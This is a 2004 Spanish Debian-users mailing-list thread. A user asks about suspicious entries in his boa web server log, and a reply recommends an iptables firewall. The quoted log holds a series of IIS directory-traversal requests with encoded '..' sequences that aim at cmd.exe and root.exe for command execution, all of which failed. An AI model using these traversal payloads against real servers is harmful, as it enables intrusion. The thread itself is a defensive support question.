[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Ataque al web server

En realidad lo que tenés que hacer es correrte un script iptables cuando
te conectás, de modo que tus puertos queden protegidos por un firewall.
Leete el iptables-howto de linuxdoc.org y cualquier cosa que no
esntiendas preguntá.
Sds

On Sun, Feb 08, 2004 at 12:22:28PM +0100, Raúl Hernández wrote:
> Hola a tod@s,
> 
> tengo un servidor web montado con boa (sencillo y eficaz) para poder
> ver la documentación de Debian desde Mozilla con dwww.
> 
> Esta máquina también hace de pasarela de mi mini-red local conectando
> por ppp a inet.
> 
> Hoy me ha dado por revisar los logs de bos y me encuentro:
> 
> 62.147.188.173 - - [25/Jan/2004:01:29:44 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:47 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:50 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:53 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:55 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:29:57 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:00 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:02 +0000] "GET
> 62.147.188./msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> 62.147.188. HTTP/1.0" 404 0 "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:05 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:10 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:11 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:12 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:13 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:14 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:16 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
> "-" "-"
> 62.147.188.173 - - [25/Jan/2004:01:30:18 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-"
> 
> Naturalmente mis direcciones IP son del tipo 192.168.0.0 por lo que
> esto viene del exterior.
> 
> ¿Alguien puede aclarar qué tipo de ataque es y como evitarlo en el
> futuro? Entiendo que no ha tenido éxito, ya que los ficheros referidos
> son WINDOG y no existen en mi sistema.
> 
> ¿Es suficiente la directiva Listen 192.168.X.X en /etc/boa/boa.conf
> para evitar estos temas?
> 
> También tengo las directivas en /etc/hosts.deny:
> 	ALL: PARANOID
> 	ALL: ALL
> y permitiendo solo las direcciones locales en /etc/hosts.allow, por lo
> que no me explico cómo han podido acceder desde inet siendo IPs fuera
> del rango permitido.
> 
> Gracias y ...
> -- 
> Un saludo.
> Raúl Hernández <raulh@ciccp.es>
> 
> 
> -- 
> To UNSUBSCRIBE, email to debian-user-spanish-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
> 

-- 

Fernando M. Maresca

Cel: (54) 221 15 502 3938
Cel: 0221-15-502-3938
Reply to: